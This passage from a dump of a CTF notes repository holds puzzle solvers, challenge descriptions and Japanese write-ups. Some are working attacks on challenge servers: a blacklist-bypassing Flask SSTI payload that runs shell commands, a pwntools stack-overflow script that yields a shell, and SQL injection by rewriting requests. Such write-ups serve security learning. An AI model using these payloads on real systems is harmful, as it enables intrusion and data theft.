0.5056561231613159, "avg_line_length": 22.891891479492188, "blob_id": "a297c999ecdfac81cf697b57df62280d7aa4cd2a", "content_id": "693ef5ade83d96199efa957b4603b93cb58a7d86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 884, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/2021/dCTF_2021/Bell/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ndef main(uVar2:int):\n process(uVar2)\n\ndef process(param_1:int):\n local_24 = 1\n while local_24 <= param_1:\n lVar3 = triangle(param_1, local_24)\n print(lVar3)\n io.sendline(str(lVar3))\n local_24 += 1\n\ndef triangle(param_1:int, param_2:int):\n if param_1 < param_2:\n ret = 0\n else:\n if param_1 == 1 and param_2 == 1:\n ret = 1\n else:\n if param_2 == 1:\n ret = triangle(param_1 -1, param_1 -1)\n else:\n ret2 = triangle(param_1, param_2 -1)\n ret1 = triangle(param_1 -1, param_2 -1)\n ret = ret1 + ret2\n return ret\n\nif __name__ == \"__main__\":\n io = remote('dctf-chall-bell.westeurope.azurecontainer.io','5311')\n var = int(io.recvline())\n print(var)\n\n main(var)\n \n print(io.recvall())\n io.close()\n" }, { "alpha_fraction": 0.7317073345184326, "alphanum_fraction": 0.7987805008888245, "avg_line_length": 22.428571701049805, "blob_id": "eadd82ed778a3bc1ee52d181afc5d90e52d17a54", "content_id": "79bc3148aa98fb377d853b90dea723920169944b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 224, "license_type": "no_license", "max_line_length": 99, "num_lines": 7, "path": "/2021/WaniCTF21-spring/binary/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "* 文字も所詮1と0の集合です。\n\n* sample.pyを参考に復号器を作ってみてください。\n\n[mis-binary.zip](https://score.wanictf.org/storage/ilk0qu92ecmaktxaolohic41j7oi443m/mis-binary.zip)\n\nWriter : saru\n" }, { "alpha_fraction": 0.35387489199638367, "alphanum_fraction": 0.514472484588623, "avg_line_length": 22.2391300201416, "blob_id": "7216078b650d1f64de61d12db3d4e0311a883efd", "content_id": "a08f92bac7c3f837f10760e734b1aeeb5164e967", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1301, "license_type": "no_license", "max_line_length": 108, "num_lines": 46, "path": "/2021/RaRCTF_2021/minigen/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムと出力結果が与えられる。\n\n```py\nexec('def f(x):'+'yield((x:=-~x)*x+-~-x)%727;'*100)\ng=f(id(f));print(*map(lambda c:ord(c)^next(g),list(open('f').read())))\n```\n\n```\n281 547 54 380 392 98 158 440 724 218 406 672 193 457 694 208 455 745 196 450 724\n```\n\n暗号化は`((x:=-~x)*x+-~-x)%727 * ord(c)`によって行われている。\n\n`x:=-~x`は`x>0`のとき`x:=x+1`に等しいので、`x`の値は`f(x)`の中で1ずつ増えていく。\n\nまた、`((x:=-~x)*x+-~-x)%727`を変形すると、`((x+1)*(x+1)+(-x))%727 = (x^2 + x + 1)%727`となる。\n\n差は`f(x+1)-f(x) = 2x + 2 (mod 727)`であり`x`によって決まる固定値を取り続けるので、差が同じになるような`ord(c)`の`c`を見つける。\n\n```py\nimport string\n\nCHAR = string.printable\n\nct = [281, 547, 54, 380, 392, 98, 158, 440, 724, 218, 406, 672, 193, 457, 694, 208, 455, 745, 196, 450, 724]\nflag = 'ra' # rarctf{\n\ns, t, u = ct[0]^ord('r'), ct[1]^ord('a'), ct[2]^ord('r')\nd = (t-s)%727\ndiff = ((u-t)%727 - d)\n\nfor idx in range(2,len(ct)):\n for c in CHAR:\n u = ct[idx]^ord(c)\n if d + diff == (u-t)%727:\n flag += c\n d = (u-t)%727\n s = t\n t = u\n break\nprint(flag)\n```\n\n<!-- rarctf{pyg01f_1s_fun} -->\n\n\n" }, { "alpha_fraction": 0.48603352904319763, "alphanum_fraction": 0.5865921974182129, "avg_line_length": 34.79999923706055, "blob_id": "f466ba427e1511af8c9c39ee9274c80e101b7ebe", "content_id": "41df1bfc8dfd0428311ec5c32b73957995634c04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 76, "num_lines": 5, "path": "/2021/HeroCTF_v3/Atoms/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "c = \"MtMdDsFmMdHsMdMdUuo\"\natoms = { \"Mt\": 109, \"Md\": 101, \"Ds\": 110, \"Fm\": 100, \"Hs\": 108, \"Uuo\": 118}\nfor key, value in atoms.items():\n c = c.replace(key,chr(value))\nprint(c)\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.6774193644523621, "avg_line_length": 17.600000381469727, "blob_id": "1fd120db7abf6f61b4f9f3c613980ccc18b6f920", "content_id": "f7533ac099ab82cd8de5bee81aef88803793659e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 93, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/2021/UIUCTF_2021/phpfuck/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "i hate php\n\n[http://phpfuck.chal.uiuc.tf](http://phpfuck.chal.uiuc.tf/)\n\n**author**: arxenix\n" }, { "alpha_fraction": 0.7325581312179565, "alphanum_fraction": 0.8372092843055725, "avg_line_length": 56.33333206176758, "blob_id": "243da115f1cb2c83beb692acaab6d4626046afbb", "content_id": "f313e3571fb2ce27098ccb6c293e1028d46302e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "no_license", "max_line_length": 131, "num_lines": 3, "path": "/2021/dCTF_2021/Encrypted_the_flag_I_have/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Decrypted flag is not in exact format.\n\n[EncryptedTheFlagIHave.png](https://dctf.dragonsec.si/files/3724ec93c46d68ba337d1fa0006fddcb/EncryptedTheFlagIHave.png?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6OTN9.YJ7IKw.XcuVyWpnIsVryOzovb9lCDls3dg)\n" }, { "alpha_fraction": 0.6468085050582886, "alphanum_fraction": 0.6753799319267273, "avg_line_length": 26.88135528564453, "blob_id": "830b5655ace0231dcfe9e5a9b7ac0f017f1f0c15", "content_id": "ddbf2d37f51445e5c26ba9c2f62d8e6c49e6da16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1859, "license_type": "no_license", "max_line_length": 151, "num_lines": 59, "path": "/2021/ImaginaryCTF_2021/Build-A-Website/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のソースコードが与えられる。\n\n```py\n#!/usr/bin/env python3\n\nfrom flask import Flask, render_template_string, request, redirect, url_for\nfrom base64 import b64encode, b64decode\n\napp = Flask(__name__)\n\[email protected]('/')\ndef index():\n # i dont remember how to return a string in flask so\n # here goes nothing :rooNervous:\n return render_template_string(open('templates/index.html').read())\n\[email protected]('/backend')\ndef backend():\n website_b64 = b64encode(request.args['content'].encode())\n return redirect(url_for('site', content=website_b64))\n\[email protected]('/site')\ndef site():\n content = b64decode(request.args['content']).decode()\n #prevent xss\n blacklist = ['script', 'iframe', 'cookie', 'document', \"las\", \"bas\", \"bal\", \":roocursion:\"] # no roocursion allowed\n for word in blacklist:\n if word in content:\n # this should scare them away\n content = \"*** stack smashing detected ***: python3 terminated\"\n csp = '''<head>\\n<meta http-equiv=\"Content-Security-Policy\" content=\"default-src 'none'\">\\n</head>\\n'''\n return render_template_string(csp + content)\n```\n\nFlask の SSTI が使えることが分かった。\n\n`global`の`bal`等がブラックリストに登録されているが、`a = 0x61`とすればすり抜けられる。\n\n以下を入力すると、\n\n```\n{{request['application']['\\x5f\\x5fglob\\x61ls\\x5f\\x5f']['\\x5f\\x5fbuiltins\\x5f\\x5f']['\\x5f\\x5fimport\\x5f\\x5f']('os')['popen']('ls')['read']()}}\n```\n\n```\napp.py flag.txt templates\n```\n\nと表示された。\n\nよって、以下を入力することにより、`flag.txt`の中身を見ることができる。\n\n```\n{{request['application']['\\x5f\\x5fglob\\x61ls\\x5f\\x5f']['\\x5f\\x5fbuiltins\\x5f\\x5f']['\\x5f\\x5fimport\\x5f\\x5f']('os')['popen']('cat flag.txt')['read']()}}\n```\n\n<!-- ictf{:rooYay:_:rooPOG:_:rooHappy:_:rooooooooooooooooooooooooooo:} -->\n" }, { "alpha_fraction": 0.748031497001648, "alphanum_fraction": 0.7637795209884644, "avg_line_length": 41.66666793823242, "blob_id": "f3a5d08bb380b48ee7a1a7fe8e2d021d94cb08ee", "content_id": "3f1a33c7b8363a248d8b895b0861f6e49d7a15f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 127, "license_type": "no_license", "max_line_length": 87, "num_lines": 3, "path": "/2020/KipodAfterFreeCTF/SSE_KEYGENME/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Like in the good old days, but faster.\n\n[SSE_KEYGENME](https://kaf-public.s3-eu-west-1.amazonaws.com/SSE_KEYGENME/SSE_KEYGENME)" }, { "alpha_fraction": 0.6284152865409851, "alphanum_fraction": 0.6284152865409851, "avg_line_length": 17.399999618530273, "blob_id": "41efea4dbe502c7f52c2018110fdac2a5c8efb32", "content_id": "81d8e68a91ce6324e5087e72332a07ef2ab9984b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 53, "num_lines": 10, "path": "/2021/BCACTF_2.0/Digitally_Encrypted_1/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ncipher = open('encrypted.txt','r').read().split(' ')\nkey = 'd4c70f8a67d5456d'\nplain = b''\n\nfor c in cipher:\n plain += xor(bytes.fromhex(c),bytes.fromhex(key))\n\nprint(plain)" }, { "alpha_fraction": 0.525519847869873, "alphanum_fraction": 0.6729678511619568, "avg_line_length": 21.08333396911621, "blob_id": "a770a139febb6fd0f3fcd2ca76946541facc092f", "content_id": "c5a73ae121d95a3cdc2d3f721c8415d8f648f97c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 771, "license_type": "no_license", "max_line_length": 91, "num_lines": 24, "path": "/2021/UMassCTF_2021/PikCha/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nページにアクセスすると、ポケモンの画像と入力フォームが表示される。\n\n![](img/2021-03-28-13-03-35.png)\n\nソースコードが与えられていないので詳細は分からないが、ランダムに表示される画像のファイル名を当てると予想。試しに、`find . -name *`と入力したところカウントが1進んだ。\n\n![](img/2021-03-28-13-03-01.png)\n\n500回送るとフラグが表示された。\n\n```py\nimport requests\n\ndata = {'guess':'find . -name *'}\nwith requests.Session() as session:\n r = session.get(\"http://104.197.195.221:8084/\")\n for _ in range(500):\n r = session.post(\"http://104.197.195.221:8084/\",data=data)\n print(r.text)\n```\n\n<!-- UMASS{G0tt4_c4tch_th3m_4ll_17263548} -->" }, { "alpha_fraction": 0.7972350120544434, "alphanum_fraction": 0.8341013789176941, "avg_line_length": 23.11111068725586, "blob_id": "437878e5eca0b8e4ee03e451a66d2261d2663b1c", "content_id": "9b533bb4792d23280bf7abcdd3922c07d1c7ed82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 357, "license_type": "no_license", "max_line_length": 101, "num_lines": 9, "path": "/2021/WaniCTF21-spring/execute/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "コマンドを間違えて、ソースコードも消しちゃった!\n\n今残っているファイルだけで実行して頂けますか?\n\n(reverse engineeringすれば、実行しなくても中身は分かるみたいです。)\n\n[rev-execute.zip](https://score.wanictf.org/storage/xhtmi35ruy8xvkdyv2qpgps2jnpbsipr/rev-execute.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.7413793206214905, "alphanum_fraction": 0.7650862336158752, "avg_line_length": 30, "blob_id": "5f5222249343564645f2875b60dea4da91dc33a7", "content_id": "684f354073c56a8f04dcafff400293b383a0c4d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "no_license", "max_line_length": 200, "num_lines": 15, "path": "/2021/BCACTF_2.0/BCA_Mart/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "After the pandemic hit, everybody closed up shop and moved online. Not wanting to be left behind, BCA MART is launching its own digital presence. Shop BCA MART from the comfort of your own home today!\n\n[bca-mart.c](https://objects.bcactf.com/bcactf2/bca-mart/bca-mart.c)\n\n[bca-mart](https://objects.bcactf.com/bcactf2/bca-mart/bca-mart)\n\n`nc bin.bcactf.com 49153`\n\nHint 1 of 2\n\nHow do computers store numbers?\n\nHint 2 of 2\n\nHow do computers store negative numbers?" }, { "alpha_fraction": 0.6574585437774658, "alphanum_fraction": 0.7182320356369019, "avg_line_length": 15.454545021057129, "blob_id": "1dd79aef8999c61dc2984b3110ab712b13de6bea", "content_id": "93180c86a888f85a50ae7473e6bab2524d93bb94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 181, "license_type": "no_license", "max_line_length": 88, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/Rock_Solid_Algorithm/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nSomething was the wrong size here...\n\n**Attachments**\n\n[https://imaginaryctf.org/r/3198-secure.txt](https://imaginaryctf.org/r/3198-secure.txt)\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.8461538553237915, "alphanum_fraction": 0.8552036285400391, "avg_line_length": 30.428571701049805, "blob_id": "e7eb4b144097d2dbe1edb420696f14c1a8c10574", "content_id": "0433f8674c16776c502d9abb5f9742729fc1f8f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 383, "license_type": "no_license", "max_line_length": 101, "num_lines": 7, "path": "/2020/WaniCTF/ALLIGATOR_03/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Dr.WANIはいつも同じパスワードを使うらしいです。\n\nDr.WANIのパソコンから入手したパス付のzipファイルを開けて、博士の秘密を暴いてしまいましょう。\n\n[wani_secret.zip](https://score.wanictf.org/storage/objbciviflccyrvhgqxffbykqqurjowv/wani_secret.zip)\n\n(ALLIGATOR_01で配布されているファイルを使ってください)\n\n" }, { "alpha_fraction": 0.6541353464126587, "alphanum_fraction": 0.7744361162185669, "avg_line_length": 28.66666603088379, "blob_id": "66f247cfafd8831b8f8dd78e6ed10d8dae02c836", "content_id": "b0de453e9dafce8172eaf3b56564db6a209c07d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 266, "license_type": "no_license", "max_line_length": 90, "num_lines": 9, "path": "/2021/justCTF_2020/25519/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "One time signatures, so you can spend your coins only once.\n\nPlease solve the task locally first and reach our server only for the flag :)\n\n```\nnc c25519.nc.jctf.pro 1337\n```\n\nhttps://ams3.digitaloceanspaces.com/justctf/6f7420f1-b591-47a0-98f2-40fd097c33de/task.sage" }, { "alpha_fraction": 0.4725363552570343, "alphanum_fraction": 0.6663973927497864, "avg_line_length": 32.76363754272461, "blob_id": "b34f8257aa166d7802e213dbc10fd550d261e9a3", "content_id": "5ec0152597a36ad2ead55724b068046880eb8bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3860, "license_type": "no_license", "max_line_length": 221, "num_lines": 110, "path": "/2021/ImaginaryCTF_2021/stackoverflow/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nELFファイルが与えられる。\n\n```\n$ file stackoverflow\nstackoverflow: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=c7bd1104c0adbdb1357db265116844c7a1304c4e, not stripped\n```\n\n```\n$ ./stackoverflow\nWelcome to StackOverflow! Before you start ~~copypasting code~~ asking good questions, we would like you to answer a question. What's your favorite color?\nred\nThanks! Now onto the posts!\nERROR: FEATURE NOT IMPLEMENTED YET\n```\n\nGDBで解析したところ、以下の命令文を満たせばよいことが分かった。\n\n```\ncmp QWORD PTR [rbp-0x8],0x69637466\n```\n\n```\n[----------------------------------registers-----------------------------------]\nRAX: 0x0\nRBX: 0x555555554880 (<__libc_csu_init>: push r15)\nRCX: 0x7ffff7ed51e7 (<__GI___libc_write+23>: cmp rax,0xfffffffffffff000)\nRDX: 0x0\nRSI: 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\nRDI: 0x5555555549a3 --> 0x6b6e616854007325 ('%s')\nRBP: 0x7fffffffde70 --> 0x0\nRSP: 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\nRIP: 0x555555554825 (<main+107>: call 0x555555554690 <__isoc99_scanf@plt>)\nR8 : 0x9b\nR9 : 0x7ffff7fe0d50 (endbr64)\nR10: 0xf\nR11: 0x246\nR12: 0x5555555546b0 (<_start>: xor ebp,ebp)\nR13: 0x7fffffffdf60 --> 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\n[-------------------------------------code-------------------------------------]\n 0x555555554816 <main+92>: mov rsi,rax\n 0x555555554819 <main+95>: lea rdi,[rip+0x183] # 0x5555555549a3\n 0x555555554820 <main+102>: mov eax,0x0\n=> 0x555555554825 <main+107>: call 0x555555554690 <__isoc99_scanf@plt>\n 0x55555555482a <main+112>: lea rdi,[rip+0x175] # 0x5555555549a6\n 0x555555554831 <main+119>: call 0x555555554660 <puts@plt>\n 0x555555554836 <main+124>: cmp QWORD PTR [rbp-0x8],0x69637466\n 0x55555555483e <main+132>: jne 0x55555555485f <main+165>\nGuessed arguments:\narg[0]: 0x5555555549a3 --> 0x6b6e616854007325 ('%s')\narg[1]: 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\n[------------------------------------stack-------------------------------------]\n0000| 0x7fffffffde40 --> 0x7ffff7fb4fc8 --> 0x0\n0008| 0x7fffffffde48 --> 0x555555554880 (<__libc_csu_init>: push r15)\n0016| 0x7fffffffde50 --> 0x0\n0024| 0x7fffffffde58 --> 0x5555555546b0 (<_start>: xor ebp,ebp)\n0032| 0x7fffffffde60 --> 0x7fffffffdf60 --> 0x1\n0040| 0x7fffffffde68 --> 0x42424242 ('BBBB')\n0048| 0x7fffffffde70 --> 0x0\n0056| 0x7fffffffde78 --> 0x7ffff7deb0b3 (<__libc_start_main+243>: mov edi,eax)\n[------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n0x0000555555554825 in main ()\n```\n\noffset は 40 である。\n\n```\ngdb-peda$ xi $rbp-0x8\n0x7fffffffde68 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\")\nVirtual memory mapping:\nStart : 0x00007ffffffde000\nEnd : 0x00007ffffffff000\nOffset: 0x1fe68\nPerm : rw-p\nName : [stack]\ngdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\nAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40\n```\n\n以下のコードを実行するとシェルが実行できるようになる。\n\n```py\nfrom pwn import *\n\nio = remote('chal.imaginaryctf.org', '42001')\n\npayload = p32(0x69637466)\n\nio.sendline(b'\\x00'*40 + payload)\nio.interactive()\n```\n\n```bash\n$ python3 solver.py\nWelcome to StackOverflow! Before you start ~~copypasting code~~ asking good questions, we would like you to answer a question. What's your favorite color?\nThanks! Now onto the posts!\nDEBUG MODE ACTIVATED.\n$ ls\nflag.txt\nrun\n$ cat flag.txt\nictf{4nd_th4t_1s_why_y0u_ch3ck_1nput_l3ngth5_486b39aa}\n```\n\n<!-- ictf{4nd_th4t_1s_why_y0u_ch3ck_1nput_l3ngth5_486b39aa} -->\n" }, { "alpha_fraction": 0.6160714030265808, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 21.600000381469727, "blob_id": "853edf5976d23b108dd9002920c8a19b2109ffbe", "content_id": "876e8255af2c3a9c63aacec8fcf7e2bd69da396b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 112, "license_type": "no_license", "max_line_length": 87, "num_lines": 5, "path": "/2021/RITSEC_CTF_2021/snek/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "No step on snek\n\n~knif3\n\n[snek](https://ctf.ritsec.club/files/7499aedbcfa15e66d15a95e90165eae0/snek?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6N30.YHGWzg.BCoaA25o1dCwvDxyzGidT9evr_c)" }, { "alpha_fraction": 0.6949806809425354, "alphanum_fraction": 0.7722007632255554, "avg_line_length": 31.375, "blob_id": "380cd7f233a004eef5ac679b2de01d5ad0e6a85b", "content_id": "15fb4827d528cf4f2e1c9812fdd9328200164123", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 259, "license_type": "no_license", "max_line_length": 104, "num_lines": 8, "path": "/2021/HeroCTF_v3/HolyAbbot/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A certain abbot tried to give us a message...\n\n(the message is in lower case) (No need to speak French)\n\nFormat : Hero{messageinlowercase}\nAuthor : Thib\n\n[HolyAbbot.txt](https://www.heroctf.fr/files/d35f6ad869c194363c4cbcce308d5220/HolyAbbot.txt?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjM1fQ.YIQ3Mg.M_LehNMo44dWs-JU-4CaiPsjxlk)\n" }, { "alpha_fraction": 0.5803213119506836, "alphanum_fraction": 0.6305220723152161, "avg_line_length": 18.153846740722656, "blob_id": "c05631dde77aeccd2db32f8811ef8ef40cd45844", "content_id": "3fcbf24de84712aa56e926ad6c69914f8c779433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 728, "license_type": "no_license", "max_line_length": 138, "num_lines": 26, "path": "/2021/BCACTF_2.0/Infinite_Zip/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nzipファイルが与えられる。\n\n試しに解凍してみると、さらにzipファイルが出てきた。unzipを何度も繰り返す必要がある。\n\n以下のコマンドで再帰的に解凍していったところ、画像ファイルが手に入った。\n\n```bash\n$ while [ \"`find . -type f -name '*.zip' | wc -l`\" -gt 0 ]; do find -type f -name \"*.zip\" -exec unzip -- '{}' \\; -exec rm -- '{}' \\;; done\n```\n\n![](./extract/flag.png)\n\n```\nbcactf{n0_f14g_4_u}\n```\n\nと思ったら、これはダミーでstringsコマンドで本当のフラグが得られる。\n\n```bash\n$ strings flag.png | grep bcactf\n <rdf:li>bcactf{z1p_1n51d3_4_z1p_4_3v3r}</rdf:li>\n```\n\n<!-- bcactf{z1p_1n51d3_4_z1p_4_3v3r} -->\n" }, { "alpha_fraction": 0.46524062752723694, "alphanum_fraction": 0.6791443824768066, "avg_line_length": 13.410256385803223, "blob_id": "bb6fa1ea7a3ebe8faf36de2017b54008b43350a0", "content_id": "7db86bcd10fabd4fb8eff4071d6cde93287ae2a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 797, "license_type": "no_license", "max_line_length": 64, "num_lines": 39, "path": "/2020/kksctf_open_2020/motor_sounds/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nファイルの中身には以下のような文字列が書かれている。\n\n```\nG0 F15000 X9 Y6 Z2\nG1 F1500 E-6.5\nG0 F4285.7 X66.444 Y105.4 Z0.27\nG0 X66.988 Y105.085\nG1 F1500 E0\nG1 F1200 X71.075 Y103.179 E0.0668\n.\n.\n.\n```\n\n調べてみると、これは`G-code`と呼ばれる形式で書かれていることが分かった。3Dプリンターを動かすときに使われているようだ。\n\n* https://note.com/disconosuke/n/n8a3953fdd286\n\n* https://reprap.org/wiki/G-code/ja\n\nオンラインでG-codeを描画してみる。\n\n* http://gcode.ws/\n\n![](img/2020-12-12-21-22-16.png)\n\n![](img/2020-12-12-21-23-28.png)\n\n見にくいが、真ん中の列にフラグが描画されている。\n\n* KKS2020\n\n* kks{ <!--W3_c@N_1n_3D!--> }\n\n* Happy new year!\n\n<!-- kks{W3_c@N_1n_3D!} -->" }, { "alpha_fraction": 0.445738822221756, "alphanum_fraction": 0.4727161228656769, "avg_line_length": 24.904762268066406, "blob_id": "e6b22599fa5c595f859f4392e56da9017be9691d", "content_id": "cd27b0a5848753d8b01abd2060cc809be5c47571", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1777, "license_type": "no_license", "max_line_length": 80, "num_lines": 63, "path": "/2021/angstromCTF_2021/Archaic/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nはじめに用意されたシェルサーバーへアクセスする。\n\n```\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in /usr/share/doc/*/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nWelcome to the\n _ _ __\n () | | | | / _|\n __ _ _ __ __ _ ___| |_ _ __ ___ _ __ ___ ___| |_| |_\n / _` | '_ \\ / _` / __| __| '__/ _ \\| '_ ` _ \\ / __| __| _|\n| (_| | | | | (_| \\__ \\ |_| | | (_) | | | | | | (__| |_| |\n \\__,_|_| |_|\\__, |___/\\__|_| \\___/|_| |_| |_|\\___|\\__|_|\n __/ |\n |___/\n\nshell server!\n\n*==============================================================================*\n* Please be respectful of other users. Abuse may result in disqualification. *\n*Data can be wiped at ANY TIME with NO WARNING. Keep backups of important data!*\n*==============================================================================*\nteam8861@actf:~$\n```\n\n`/problems/2021/archaic/archive.tar.gz`を取ってくる。\n\n```bash\n$ cp /problems/2021/archaic/archive.tar.gz ./\n```\n\n拡張子が`.tar`なので解凍する。\n\n```bash\n$ tar -xzvf archive.tar.gz\nflag.txt\n```\n\n`flag.txt`の中身を見る。読み取り権限がないので、権限をつけてから読む。\n\n```bash\n$ cat flag.txt\ncat: flag.txt: Permission denied\n\n$ ls -la flag.txt\n---------- 1 team8861 team8861 37 Apr 1 1921 flag.txt\n\n$ chmod +r flag.txt\n\n$ ls -la flag.txt\n-r--r--r-- 1 team8861 team8861 37 Apr 1 1921 flag.txt\n\n$ cat flag.txt\nactf{thou_hast_uncovered_ye_ol_fleg}\n```\n\n<!-- actf{thou_hast_uncovered_ye_ol_fleg} -->" }, { "alpha_fraction": 0.6027164459228516, "alphanum_fraction": 0.7181664109230042, "avg_line_length": 21.653846740722656, "blob_id": "b7f983aa8798f044a3249015761f8d3dfa04db14", "content_id": "4619e7d6b24c9b133fcca93ac37552ca021bb5a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 911, "license_type": "no_license", "max_line_length": 86, "num_lines": 26, "path": "/2021/redpwnCTF_2021/secure/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[secure.mc.ax](https://secure.mc.ax/) にアクセスするとログイン画面が表示される。\n\n与えられたソースコードを読むと、UsernameとPasswordはBase64でエンコードされていることが分かる。\n\n```js\ndb.exec(`INSERT INTO users (username, password) VALUES (\n '${btoa('admin')}',\n '${btoa(crypto.randomUUID)}'\n)`);\n```\n\n試しに`admin : admin`でログインすると以下のように表示される。\n\n![](img/2021-07-10-17-09-25.png)\n\n入力フォームからのリクエストでは、`A-Za-z0-9+/=`の文字列しか使用できない。\n\nしかし、実際にBase64に変換しているのはフロントエンドのJavaScript部分なので、POSTリクエストを書き換えて SQL injection を行うことができる。\n\n![](img/2021-07-10-17-16-56.png)\n\n![](img/2021-07-10-17-03-42.png)\n\n<!-- flag{50m37h1n6_50m37h1n6_cl13n7_n07_600d} -->\n" }, { "alpha_fraction": 0.8220859169960022, "alphanum_fraction": 0.8527607321739197, "avg_line_length": 31.600000381469727, "blob_id": "272adf553ff105cbb05ea7a9e68ef798f4dbd6f9", "content_id": "e355c7a99bc52b6ef5a51f487600e40ab789e88d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 251, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2021/WaniCTF21-spring/MixedUSB/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "USBにパーティションを設定したら、どこにFLAGを保存しているのかわからなくなってしまいました...\n\n[MixedUSB.img](https://mega.nz/file/AWBnRIhZ#7apL0Egu5LfvVoTkkoIEwKQjbF1McFvUmFIgeX0RLCU)\n\nWriter : takushooo\n" }, { "alpha_fraction": 0.7389034032821655, "alphanum_fraction": 0.7859007716178894, "avg_line_length": 19.7297306060791, "blob_id": "a6cb3fd373d4ad78e149292d51d597528288c34c", "content_id": "d4ed9673fa3dd203c86827171e2c10a295cbf8a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1448, "license_type": "no_license", "max_line_length": 126, "num_lines": 37, "path": 